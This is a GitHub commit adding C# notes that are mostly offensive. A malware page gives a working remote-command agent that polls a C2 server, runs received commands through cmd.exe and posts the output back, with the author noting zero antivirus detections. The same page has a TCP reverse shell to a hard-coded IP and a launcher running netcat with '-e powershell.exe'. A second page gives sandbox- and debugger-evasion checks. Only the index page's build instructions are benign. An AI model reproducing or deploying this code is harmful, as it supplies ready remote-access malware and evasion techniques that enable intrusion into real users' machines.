Skip to content

Commit

Permalink
add docs on csharp
Browse files Browse the repository at this point in the history
  • Loading branch information
xanhacks committed Dec 14, 2022
1 parent 154c21c commit 6e0b12f
Show file tree
Hide file tree
Showing 4 changed files with 360 additions and 123 deletions.
221 changes: 221 additions & 0 deletions docs/programming/charp/01-csharp-malware.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,221 @@
---
title: C# Malware
description: Introduction to C# malware dev
---

# Malware

## Very simple agent

A very simple program that is constantly requesting a C2 using HTTPs and sending the output of commands received via POST requests.

I send this malware on [VirusTotal](https://www.virustotal.com/gui/file/1d0873b354a1a9f6e80d0263ffb2ca1696e2cbb095ed101b7237b7f833599821?nocache=1) and I got 0 detection over 70 AVs.

```csharp
using System.Text;
using System.Diagnostics;

namespace Program
{
class Program
{
private string url;

static void Main(string[] args)
{
Program prog = new Program("https://yxzimlegitxyz.free.beeceptor.com");
prog.MainLoop();
}

public Program (string url)
{
this.url = url;
}

public void MainLoop()
{
this.Fingerprinting();

while (true)
{
this.Sleep(GenerateRandomNumber(0, 5));

string command = this.SendGetRequest(this.url + "/cmd");
string result = this.ExecuteCmd(command);
this.SendPostRequest(this.url, result);
}
}

private void Fingerprinting()
{
string username = this.GetUsername();
this.SendPostRequest(this.url, username);
}

private int GenerateRandomNumber(int min, int max)
{
return new Random().Next(min, max);
}

private void Sleep(int seconds)
{
Thread.Sleep(seconds * 1000);
}

private string ExecuteCmd(string command)
{
var process = new Process
{
StartInfo = new ProcessStartInfo
{
FileName = "cmd.exe",
Arguments = $"/c {command}",
UseShellExecute = false,
RedirectStandardOutput = true,
RedirectStandardError = true,
CreateNoWindow = true
}
};
process.Start();

string stdout = process.StandardOutput.ReadToEnd();
string stderr = process.StandardError.ReadToEnd();

process.WaitForExit();

StringBuilder output = new StringBuilder();
output.Append(stdout);
output.Append(stderr);
return output.ToString();
}

private string GetUsername()
{
return Environment.UserName;
}

private string Base64Encode(string data)
{
return Convert.ToBase64String(Encoding.UTF8.GetBytes(data));
}

private string SendGetRequest(string url)
{
HttpClient client = new HttpClient();
HttpResponseMessage response = client.GetAsync(url).Result;

return response.Content.ReadAsStringAsync().Result;
}

public string SendPostRequest(string url, string body)
{
HttpClient client = new HttpClient();
StringContent content = new StringContent(
this.Base64Encode(body),
Encoding.UTF8, "text/plain"
);

HttpResponseMessage response = client.PostAsync(url, content).Result;
return response.Content.ReadAsStringAsync().Result;
}
}
}
```

## TCP Reverse shell

> Source [www.revshells.com](https://www.revshells.com/).
```c#
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;


namespace ConnectBack
{
public class Program
{
static StreamWriter streamWriter;

public static void Main(string[] args)
{
using(TcpClient client = new TcpClient("10.200.196.200", 15555))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream);

StringBuilder strInput = new StringBuilder();

Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();

while(true)
{
strInput.Append(rdr.ReadLine());
//strInput.Append("\n");
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}

private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder();

if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
}

}
}
```

## Shell commands

```csharp
using System;
using System.Diagnostics;

namespace Example {
class Program {
static void Main() {
Process proc = new Process();
ProcessStartInfo procInfo = new ProcessStartInfo(
"c:\\Windows\\Temp\\nc.exe",
"-e powershell.exe 10.50.82.172 4444"
);
procInfo.CreateNoWindow = true;
proc.StartInfo = procInfo;
proc.Start();
}
}
}
```
97 changes: 97 additions & 0 deletions docs/programming/charp/02-csharp-evasion.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,97 @@
---
title: Sandbox evasion
description: Introduction to C# sandbox evasion
---

# Sandbox Evasion

## Sleep

```csharp
/**
* Sleep for a certain amounts of seconds.
*/
private void Sleep(int seconds)
{
Thread.Sleep(seconds * 1000);
}
```

## Mouse is moving

```csharp
using System.Runtime.InteropServices;

// ...
[DllImport("user32.dll")]
static extern bool GetCursorPos(out Point lpPoint);

public Point GetMousePosition()
{
GetCursorPos(out Point lpPoint);
return lpPoint;
}

[StructLayout(LayoutKind.Sequential)]
public struct Point
{
public int X;
public int Y;
}

/**
* Exit the program if the position of the mouse has not changed in 30 seconds.
*/
public void CheckMouseIsMoving()
{
Point mousePosition = this.GetMousePosition();
this.Sleep(30);
Point newMousePosition = this.GetMousePosition();

if (mousePosition.X == newMousePosition.X &&
mousePosition.Y == newMousePosition.Y) Environment.Exit(1337);
}
```

## Numbers of CPUs

```csharp
/**
* Exit the program if the number of CPU is below or equals to 2.
*/
public void CheckCPUCount()
{
if (Environment.ProcessorCount <= 2) Environment.Exit(1337);
}
```


## Presence of Debugger

```csharp
using System.Diagnostics;

// ...
/**
* Exit the program if a debugger is attached to the process.
*/
public void CheckDebugger()
{
if (Debugger.IsAttached) Environment.Exit(1337);
}
```

## Uptime

```csharp
/**
* Exit the program if the uptime is less than 15 minutes.
*/
public void CheckUptime()
{
int uptime = (Environment.TickCount & Int32.MaxValue) / 1000;
if (uptime / 60 < 15) Environment.Exit(1337);
}
```
42 changes: 42 additions & 0 deletions docs/programming/charp/index.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,42 @@
---
title: Introduction to C#
description: Introduction to C#
---

# Introduction to C\#

## Definition

C# (pronounced "C-sharp") is a modern, object-oriented programming language developed by Microsoft. It was first released in 2000 as part of the .NET framework, and it is designed to be used for building a wide range of applications, from simple command-line programs to complex, enterprise-level applications. C# is a type-safe, managed language, meaning that the runtime environment automatically handles memory management and other low-level details, allowing developers to focus on writing code. C# is a statically-typed language, meaning that types are checked at compile-time rather than at runtime. This makes C# programs more efficient and less prone to runtime errors.

## Build

### Windows

To build dotnet project you need to install [Visual Studio](https://visualstudio.microsoft.com/).

MSDN :

- [Single-file deployment and executable](https://learn.microsoft.com/en-us/dotnet/core/deploying/single-file/overview?tabs=cli)
- [Trimming options](https://learn.microsoft.com/en-us/dotnet/core/deploying/trimming/trimming-options)

Command to generate a [self-contained](https://learn.microsoft.com/en-us/dotnet/core/deploying/deploy-with-cli#self-contained-deployment) PE without symbols.

```powershell
dotnet publish -c Release -r win-x64 --self-contained -p:PublishSingleFile=true -p:DebugType=none -p:DebugSymbols=false -p:PublishTrimmed=true
```

### Linux

On Linux you can install `mono` which is a .NET compiler and runtime.

Arch : `sudo pacman -S mono`

Compilation :

```bash
$ vim Main.cs
$ mcs Main.cs
$ file Main.exe
Main.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
```
Loading

0 comments on commit 6e0b12f

Please sign in to comment.